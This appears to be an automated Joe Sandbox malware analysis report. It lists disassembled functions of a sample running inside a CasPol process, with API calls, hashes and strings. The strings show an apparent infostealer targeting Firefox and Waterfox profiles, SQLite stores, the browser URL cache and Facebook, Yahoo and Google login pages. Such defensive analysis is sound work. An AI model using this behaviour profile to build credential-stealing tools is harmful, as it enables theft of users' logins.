                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                  Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                  • String ID: BIN
                                                                                                                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                  • API String ID: 3527940856-11920434
                                                                                                                                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                  • String ID: $0.@
                                                                                                                                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                  Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2941347001-0
                                                                                                                                                                                                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                  • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                  Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 669240632-0
                                                                                                                                                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                  • String ID: "%s"
                                                                                                                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                  Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2911713577-0
                                                                                                                                                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                  Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                  Memory Dump Source
